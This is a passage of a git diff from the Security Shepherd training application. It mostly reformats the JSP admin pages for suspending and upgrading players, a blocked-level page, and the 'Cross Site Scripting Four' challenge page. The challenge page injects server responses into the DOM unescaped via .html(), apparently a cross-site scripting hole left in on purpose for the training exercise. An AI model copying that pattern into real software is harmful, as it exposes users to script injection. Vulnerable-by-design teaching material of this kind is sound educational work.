-                    async: false
-                });
-                $("#loadingDiv").hide("fast", function () {
-                    if (ajaxCall.status == 200) {
-                        //Now output Result Div and Show
-                        $("#resultDiv").html(ajaxCall.responseText);
-                        $("#resultDiv").show("fast");
-                    } else {
-                        $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                        $("#badData").show("slow");
-                    }
-                    $("#suspendDiv").slideDown("slow");
-                });
-            });
-        }
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	$("#selectClass").change(function () {
+		var theCsrfToken = $('#csrfToken').val();
+		var ajaxCall = $.ajax({
+			type: "POST",
+			url: "getPlayersByClass",
+			data: {
+				classId: $("#selectClass option:selected").val(),
+				csrfToken: theCsrfToken
+			},
+			async: false
+		});
+		if(ajaxCall.status == 200)
+		{
+			$("#playerSelect").hide("fast", function(){
+				if(ajaxCall.responseText == '')
+				{
+					$("#playerSelect").html("<p><font color='red'>Sorry, but there are no players in this class</font></p>");
+				}
+				else if(ajaxCall.responseText == 'fail')
+				{
+					$("#playerSelect").html("<p><font color='red'>Sorry, but an error occured! Please try again!</font></p>");
+				}
+				else
+				{
+					$("#playerSelect").html("<center><select id='playerId' style='width: 300px'>" + ajaxCall.responseText + "</select><br></center>");
+				}
+				$("#playerSelect").show("slow");
+			});
+		}
+		else
+		{
+			$("#badData").html("<p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+		}
+	});
+	
+	$("#theForm").submit(function(){
+		//Get Data
+		var theCsrfToken = $('#csrfToken').val();
+		var thePlayers = $("#playerId").val();
+		//Validation
+		if (thePlayers == null)
+		{
+			$('#badData').html("<p><strong><font color='red'>Please select a player to suspend.</font></strong></p>");
+		}
+		else
+		{
+			//Hide&Show Stuff
+			$("#loadingDiv").show("fast");
+			$("#badData").hide("fast");
+			$("#resultDiv").hide("fast");
+			$("#suspendDiv").slideUp("fast", function(){
+				//The Ajax Operation
+				var ajaxCall = $.ajax({
+					type: "POST",
+					url: "unSuspendPlayer",
+					data: {
+						player: thePlayers,
+						csrfToken: theCsrfToken
+					},
+					async: false
+				});
+				$("#loadingDiv").hide("fast", function(){
+					if(ajaxCall.status == 200)
+					{
+						//Now output Result Div and Show
+						$("#resultDiv").html(ajaxCall.responseText);
+						$("#resultDiv").show("fast");
+					}
+					else
+					{
+						$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+						$("#badData").show("slow");
+					}
+					$("#suspendDiv").slideDown("slow");
+				});
+			});
+		}
+	});
+	</script>
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
 <% } %>
 <%
-        } else {
-            response.sendRedirect("../../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../../loggedOutSheep.html");
-    }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/admin/userManagement/upgradePlayers.jsp b/src/main/webapp/admin/userManagement/upgradePlayers.jsp
index 7accbaca5..4dbd8c0ee 100644
--- a/src/main/webapp/admin/userManagement/upgradePlayers.jsp
+++ b/src/main/webapp/admin/userManagement/upgradePlayers.jsp
@@ -1,198 +1,228 @@
 <%@ page contentType="text/html; charset=iso-8859-1" language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*, servlets.admin.userManagement.GetPlayersByClass"
-         errorPage="" %>
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*, servlets.admin.userManagement.GetPlayersByClass"
+	errorPage=""%>
 
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: upgradePlayer.jsp *************************");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: upgradePlayer.jsp *************************");
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        Getter get = new Getter();
+ 
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
 //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(upgradePlayers.jsp): tokenCookie Error:" + htmlE.toString());
-        }
+Cookie tokenCookie = null;
+try
+{
+	tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(upgradePlayers.jsp): tokenCookie Error:" + htmlE.toString());
+}
 // validateAdminSession ensures a valid session, and valid administrator credentials
 // Also, if tokenCookie != null, then the page is good to continue loading
 // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
-        Object tokenParmeter = request.getParameter("csrfToken");
-        if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
 
 //Logging Username
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 // Getting Session Variables
 //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
 
-            String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
-            String userName = Encode.forHtml(ses.getAttribute("userName").toString());
-            String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
-            String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
-            String ApplicationRoot = getServletContext().getRealPath("");
-            boolean showClasses = false;
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String userName = Encode.forHtml(ses.getAttribute("userName").toString());
+String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
+String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+String ApplicationRoot = getServletContext().getRealPath("");
+boolean showClasses = false;
 
-            ResultSet classList = Getter.getClassInfo(ApplicationRoot);
-            try {
-                showClasses = classList.next();
-            } catch (SQLException e) {
-                ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
-                showClasses = false;
-            }
+ResultSet classList = Getter.getClassInfo(ApplicationRoot);
+try
+{
+	showClasses = classList.next();
+}
+catch(SQLException e)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
+	showClasses = false;
+}
 %>
 <div id="formDiv" class="post">
-    <h1 class="title">Upgrade Players</h1>
-    <div id="upgradeDiv" class="entry">
-        <form id="theForm" action="javascript:;">
-            <p>Please select the player that you would like to upgrade to an
-                administrator</p>
-            <div id="badData"></div>
-            <input type="hidden" id="csrfToken" value="<%=csrfToken%>"/>
-            <table align="center">
-                <tr>
-                    <td>
-                        <p>Class:</p>
-                    </td>
-                    <td><select id="selectClass">
-                        <option value="">Unassigned Players</option>
-                        <%
-                            if (showClasses) {
-                                try {
-                                    do {
-                                        String classId = Encode.forHtml(classList.getString(1));
-                                        String classYearName = Encode.forHtml(classList.getString(3)) + " " + Encode.forHtml(classList.getString(2));
-                        %>
-                        <option value="<%=classId%>"><%=classYearName%>
-                        </option>
-                        <%
-                                    }
-                                    while (classList.next());
-                                    classList.first();
-                                } catch (SQLException e) {
-                                    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Error occured when manipulating classList: " + e.toString());
-                                    showClasses = false;
-                                }
-                            }
-                        %>
-                    </select></td>
-                </tr>
-                <tr>
-                    <td colspan="2">
-                        <p>Select the players that you want to assign here</p>
-                        <div id="playerSelect">
-                            <center>
-                                <select id='playerId' style='width: 300px;'>
-                                    <%= GetPlayersByClass.playersInOptionTags(Getter.getPlayersByClass(ApplicationRoot, null)) %>
-                                </select>
-                            </center>
-                        </div>
-                    </td>
-                </tr>
-                <tr>
-                    <td colspan="2" align="center"><input type="submit"
-                                                          id="submitButton" value="Upgrade Player"/></td>
-                </tr>
-            </table>
-        </form>
-    </div>
-    <br>
-    <div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
-    <div id="resultDiv" style="display: none;" class="informationBox"></div>
-    <div id="badData"></div>
+	<h1 class="title">Upgrade Players</h1>
+	<div id="upgradeDiv" class="entry">
+		<form id="theForm" action="javascript:;">
+			<p>Please select the player that you would like to upgrade to an
+				administrator</p>
+			<div id="badData"></div>
+			<input type="hidden" id="csrfToken" value="<%=csrfToken%>" />
+			<table align="center">
+				<tr>
+					<td>
+						<p>Class:</p>
+					</td>
+					<td><select id="selectClass">
+							<option value="">Unassigned Players</option>
+							<%
+									if(showClasses)
+														{
+															try
+															{
+																do
+																{
+																	String classId = Encode.forHtml(classList.getString(1));
+																	String classYearName = Encode.forHtml(classList.getString(3)) + " " + Encode.forHtml(classList.getString(2));
+								%>
+							<option value="<%=classId%>"><%=classYearName%></option>
+							<%
+												}
+																			while(classList.next());
+																			classList.first();
+																		}
+																		catch(SQLException e)
+																		{
+																			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Error occured when manipulating classList: " + e.toString());
+																			showClasses = false;
+																		}
+																	}
+											%>
+					</select></td>
+				</tr>
+				<tr>
+					<td colspan="2">
+						<p>Select the players that you want to assign here</p>
+						<div id="playerSelect">
+							<center>
+								<select id='playerId' style='width: 300px;'>
+									<%= GetPlayersByClass.playersInOptionTags(Getter.getPlayersByClass(ApplicationRoot, null)) %>
+								</select>
+							</center>
+						</div>
+					</td>
+				</tr>
+				<tr>
+					<td colspan="2" align="center"><input type="submit"
+						id="submitButton" value="Upgrade Player" /></td>
+				</tr>
+			</table>
+		</form>
+	</div>
+	<br>
+	<div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
+	<div id="resultDiv" style="display: none;" class="informationBox"></div>
+	<div id="badData"></div>
 </div>
 <script>
-    $("#selectClass").change(function () {
-        var theCsrfToken = $('#csrfToken').val();
-        var ajaxCall = $.ajax({
-            type: "POST",
-            url: "getPlayersByClass",
-            data: {
-                classId: $("#selectClass option:selected").val(),
-                csrfToken: theCsrfToken
-            },
-            async: false
-        });
-        if (ajaxCall.status == 200) {
-            $("#playerSelect").hide("fast", function () {
-                if (ajaxCall.responseText == '') {
-                    $("#playerSelect").html("<p><font color='red'>Sorry, but there are no players in this class</font></p>");
-                } else if (ajaxCall.responseText == 'fail') {
-                    $("#playerSelect").html("<p><font color='red'>Sorry, but an error occured! Please try again!</font></p>");
-                } else {
-                    $("#playerSelect").html("<center><select id='playerId' sytle='width: 300px'>" + ajaxCall.responseText + "</select><br></center>");
-                }
-                $("#playerSelect").show("slow");
-            });
-        } else {
-            $("#badData").html("<p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-        }
-    });
-
-    $("#theForm").submit(function () {
-        //Get Data
-        var theCsrfToken = $('#csrfToken').val();
-        var thePlayers = $("#playerId").val();
-        //Validation
-        if (thePlayers == null) {
-            $('#badData').html("<p><strong><font color='red'>Please select a player to upgrade.</font></strong></p>");
-        } else {
-            //Hide&Show Stuff
-            $("#loadingDiv").show("fast");
-            $("#badData").hide("fast");
-            $("#resultDiv").hide("fast");
-            $("#upgradeDiv").slideUp("fast", function () {
-                //The Ajax Operation
-                var ajaxCall = $.ajax({
-                    type: "POST",
-                    url: "upgradePlayer",
-                    data: {
-                        players: thePlayers,
-                        csrfToken: theCsrfToken
-                    },
-                    async: false
-                });
-                $("#loadingDiv").hide("fast", function () {
-                    if (ajaxCall.status == 200) {
-                        //Now output Result Div and Show
-                        $("#resultDiv").html(ajaxCall.responseText);
-                        $("#resultDiv").show("fast");
-                    } else {
-                        $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                        $("#badData").show("slow");
-                    }
-                    $("#upgradeDiv").slideDown("slow");
-                });
-            });
-        }
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	$("#selectClass").change(function () {
+		var theCsrfToken = $('#csrfToken').val();
+		var ajaxCall = $.ajax({
+			type: "POST",
+			url: "getPlayersByClass",
+			data: {
+				classId: $("#selectClass option:selected").val(),
+				csrfToken: theCsrfToken
+			},
+			async: false
+		});
+		if(ajaxCall.status == 200)
+		{
+			$("#playerSelect").hide("fast", function(){
+				if(ajaxCall.responseText == '')
+				{
+					$("#playerSelect").html("<p><font color='red'>Sorry, but there are no players in this class</font></p>");
+				}
+				else if(ajaxCall.responseText == 'fail')
+				{
+					$("#playerSelect").html("<p><font color='red'>Sorry, but an error occured! Please try again!</font></p>");
+				}
+				else
+				{
+					$("#playerSelect").html("<center><select id='playerId' sytle='width: 300px'>" + ajaxCall.responseText + "</select><br></center>");
+				}
+				$("#playerSelect").show("slow");
+			});
+		}
+		else
+		{
+			$("#badData").html("<p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+		}
+	});
+	
+	$("#theForm").submit(function(){
+		//Get Data
+		var theCsrfToken = $('#csrfToken').val();
+		var thePlayers = $("#playerId").val();
+		//Validation
+		if (thePlayers == null)
+		{
+			$('#badData').html("<p><strong><font color='red'>Please select a player to upgrade.</font></strong></p>");
+		}
+		else
+		{
+			//Hide&Show Stuff
+			$("#loadingDiv").show("fast");
+			$("#badData").hide("fast");
+			$("#resultDiv").hide("fast");
+			$("#upgradeDiv").slideUp("fast", function(){
+				//The Ajax Operation
+				var ajaxCall = $.ajax({
+					type: "POST",
+					url: "upgradePlayer",
+					data: {
+						players: thePlayers, 
+						csrfToken: theCsrfToken
+					},
+					async: false
+				});
+				$("#loadingDiv").hide("fast", function(){
+					if(ajaxCall.status == 200)
+					{
+						//Now output Result Div and Show
+						$("#resultDiv").html(ajaxCall.responseText);
+						$("#resultDiv").show("fast");
+					}
+					else
+					{
+						$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+						$("#badData").show("slow");
+					}
+					$("#upgradeDiv").slideDown("slow");
+				});
+			});
+		}
+	});
+	</script>
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
 <% } %>
 <%
-        } else {
-            response.sendRedirect("../../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../../loggedOutSheep.html");
-    }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/blockedMessage.jsp b/src/main/webapp/blockedMessage.jsp
index 89c804b94..31fa8e0c9 100644
--- a/src/main/webapp/blockedMessage.jsp
+++ b/src/main/webapp/blockedMessage.jsp
@@ -1,73 +1,82 @@
 <%@ page contentType="text/html; charset=iso-8859-1" language="java"
-         import="dbProcs.Getter, utils.*" errorPage="" %>
-<%@ include file="translation.jsp" %>
+	import="dbProcs.Getter, utils.*" errorPage=""%>
+<%@ include file="translation.jsp"%>
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: scoreboard.jsp *************************");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: scoreboard.jsp *************************");
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(scoreboard.jsp): tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // Also, if tokenCookie != null, then the page is good to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            //Log User Name
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Scoreboard accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ if (request.getSession() != null)
+ {
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(scoreboard.jsp): tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// Also, if tokenCookie != null, then the page is good to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		//Log User Name
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Scoreboard accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title><fmt:message
-            key="blockedMessage.text.heading.levelBlocked"/></title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title><fmt:message
+		key="blockedMessage.text.heading.levelBlocked" /></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<div id="contentDiv">
-    <h2 class="title">
-        <fmt:message key="generic.text.pleaseWait"/>
-    </h2>
-    <p>
-        <fmt:message key="blockedMessage.text.info.levelBlocked"/>
-        <br/>
-        <br/>
-        <%= ModuleBlock.getBlockerMessage() %>
-    </p>
-</div>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<div id="contentDiv">
+		<h2 class="title">
+			<fmt:message key="generic.text.pleaseWait" />
+		</h2>
+		<p>
+			<fmt:message key="blockedMessage.text.info.levelBlocked" />
+			<br />
+			<br />
+			<%= ModuleBlock.getBlockerMessage() %>
+		</p>
+	</div>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("login.jsp");
-        }
-    } else {
-        response.sendRedirect("login.jsp");
-    }
+ 	}
+	else
+	{
+		response.sendRedirect("login.jsp");
+	}
+}
+else
+{
+	response.sendRedirect("login.jsp");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/challenges/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751.jsp b/src/main/webapp/challenges/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751.jsp
index 5873eb71d..f029b3204 100644
--- a/src/main/webapp/challenges/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751.jsp
+++ b/src/main/webapp/challenges/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751.jsp
@@ -1,143 +1,152 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    // Cross Site Scripting Challenge 4
+	// Cross Site Scripting Challenge 4
 
-    String levelName = new String("Cross Site Scripting Four");
-    String levelHash = "06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751";
+String levelName = new String("Cross Site Scripting Four");
+String levelHash = "06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.xss." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.xss." + levelHash, locale);
 //Used more than once translations
-    String translatedLevelName = bundle.getString("challenge.challengeName");
+String translatedLevelName = bundle.getString("challenge.challengeName");
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            // Getting Session Variables
-            //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
-            String csrfToken = Encode.forHtml(tokenCookie.getValue());
+ 
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ 		// Getting Session Variables
+		//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+		
+		String csrfToken = Encode.forHtml(tokenCookie.getValue());
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= Encode.forHtml(translatedLevelName) %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= Encode.forHtml(translatedLevelName) %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= Encode.forHtml(translatedLevelName) %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.description") %>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("challenge.form.instruction") %>
-                </td>
-            </tr>
-            <tr>
-                <td><input style="width: 400px;" id="searchTerm"
-                           autocomplete="off" type="text"/></td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("challenge.form.makePost") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= Encode.forHtml(translatedLevelName) %></h2>
+		<p>
+			<%= bundle.getString("challenge.description") %>
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("challenge.form.instruction") %></td>
+				</tr>
+				<tr>
+					<td><input style="width: 400px;" id="searchTerm"
+						autocomplete="off" type="text" /></td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("challenge.form.makePost") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
+						</p>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        var theSearchTerm = $("#searchTerm").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                dataType: "text",
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    searchTerm: theSearchTerm,
-                    csrfToken: "<%= csrfToken %>"
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				var theSearchTerm = $("#searchTerm").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						dataType: "text",
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							searchTerm: theSearchTerm,
+							csrfToken: "<%= csrfToken %>"
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
